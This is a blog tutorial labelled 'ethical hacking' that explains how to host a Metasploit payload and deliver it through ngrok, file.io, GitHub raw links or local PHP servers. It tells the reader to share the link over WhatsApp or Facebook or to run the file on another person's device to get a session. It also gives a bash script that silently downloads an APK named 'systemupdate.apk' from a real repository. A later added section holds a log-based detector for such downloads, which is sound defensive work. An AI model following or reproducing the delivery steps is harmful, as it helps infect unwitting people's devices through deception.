Host payload or a file online for quick access and Exploit | Ethical hacking tutorial

January 18, 2022
Today we are going to learn how to host a payload for quick access using the wget or curl command in Linux or Termux.

To get the payload hosted you need a payload first. Generate a payload using Metasploit or the tools you want and follow the steps below.

Step 1: Generate a payload using portmap.io for a persistent connection.
Step 2: You can use
a) Ngrok (Wide Area Network), will take time
1- You have to create an HTML file; replace the filename with your payload name.
2- Set up Ngrok and the auth token.
3- Copy the ngrok executable, HTML file, and payload into the same directory.
Open two terminals in the same directory where you have pasted all the files.
4- Type the commands in the two terminals one by one.
Terminal 1
php -S localhost:8080
Terminal 2
./ngrok http localhost:8080
5- Copy the link (starts with https) from terminal 2 and share the link via WhatsApp or Facebook.
b) Snapdrop (Local Area Network) or file.io (WAN)
1- Open your favourite browser
2- Go to snapdrop.net
3- Open the same site on another device connected to the same network (router) (use file.io for outside the network)
4- Choose the new device visible on your mobile, select the file and upload.
5- Download it from another device.
c) ssavr (Local area link sharing), will take time
1- Open a terminal
2- Keep the HTML file (we saw above) and the payload in the same directory
3- Check your local IP by running the command ifconfig in the terminal
4- Run the command to create a local server: php -S 192.168.1.5:8080 (replace 192.16... with your local IP)
5- Open the link http://192.168.1.5:8080 on another device (use Chrome or Firefox) on the same Wi-Fi network
6- Download the file
d) GitHub (for sharing on both LAN and WAN)
This is the best method of sharing a payload or any file over the internet. It keeps the file hosted 24/7. As we discussed, this is a static payload: static means the payload never changes its IP and port, so you can install it on any device and get the session on your Metasploit listener.
1- Create an account on GitHub
2- Create a new repository and upload the file.
3- Go to the same repository and click on raw, or long-press it, to copy the link and share it with anyone. Or go to the person's device, open the browser, look for your repository, download the executable and quickly execute it. As soon as you execute the payload you'll get the session.
4- You do not have to do this again and again. Just remember your GitHub profile link, open it, and you are done.
e) By using the curl and wget commands
1- Open a terminal.
2- Create a bash script and save it as file.sh. Note that it contains two methods and the wget one is commented out. Uncomment one of them to use it. Replace https... with your link.
#!/bin/bash
# curl method: -L follows redirects, -o sets the output path, -s runs silently
curl -L -s -o /sdcard/systemupdate.apk "https://github.com/efxtv/EMSF/blob/main/termux/emsf?raw=true"
# wget method (commented out): -q runs quietly
#wget -q "https://github.com/efxtv/EMSF/blob/main/termux/emsf?raw=true"
3- Once this script gets executed, the device will automatically download the file and save it to /sdcard/
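
Seen from the monitoring side, the delivery paths above (ngrok tunnels, file.io, GitHub raw links fetched with curl or wget) leave recognisable traces in web proxy logs. The following is an added example, not part of the original tutorial: the log format, the host suffix list, the extension list and the scoring threshold are all assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit

# Assumed proxy log format (constructed for this example):
#   <client_ip> "<METHOD> <URL>" "<User-Agent>"
LOG_RE = re.compile(r'^(\S+) "(\S+) (\S+)" "([^"]*)"$')
# Services named in the tutorial; the suffix list is an assumption to tune locally.
WATCHED_SUFFIXES = ("ngrok.io", "ngrok-free.app", "file.io", "github.com",
                    "raw.githubusercontent.com")
EXEC_EXT = (".apk", ".exe", ".sh", ".elf")
CLI_AGENT = re.compile(r"^(curl|wget)/", re.I)

def host_watched(host):
    host = host.lower()
    return any(host == s or host.endswith("." + s) for s in WATCHED_SUFFIXES)

def analyse(line):
    """Return (client, url, reasons) for a log line, or None if unparsable."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    client, _method, url, agent = m.groups()
    parts = urlsplit(url)
    reasons = []
    if CLI_AGENT.match(agent):
        reasons.append("cli-downloader")
    if host_watched(parts.hostname or ""):
        reasons.append("file-hosting-or-tunnel")
    # GitHub "?raw=true" serves the raw blob, so the path may lack an extension.
    if parts.path.lower().endswith(EXEC_EXT) or "raw=true" in parts.query:
        reasons.append("binary-download")
    return client, url, reasons

def alerts(lines, threshold=2):
    """Return parsed entries matching at least `threshold` indicators."""
    hits = [analyse(line) for line in lines]
    return [h for h in hits if h and len(h[2]) >= threshold]

SAMPLE = [  # constructed log lines
    '10.0.0.7 "GET https://example.org/index.html" "Mozilla/5.0"',
    '10.0.0.9 "GET https://github.com/example-user/example-repo/blob/main/tool?raw=true" "curl/7.81.0"',
    '10.0.0.12 "GET https://abcd1234.ngrok.io/update.apk" "Mozilla/5.0 (Linux; Android 12)"',
    '10.0.0.15 "GET https://github.com/example-user/example-repo" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, url, reasons in alerts(SAMPLE):
        print(client, url, ",".join(reasons))
```

Requiring two indicators keeps ordinary browsing of GitHub from alerting while still catching a browser download of an executable from a tunnel host.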

Uk2blogger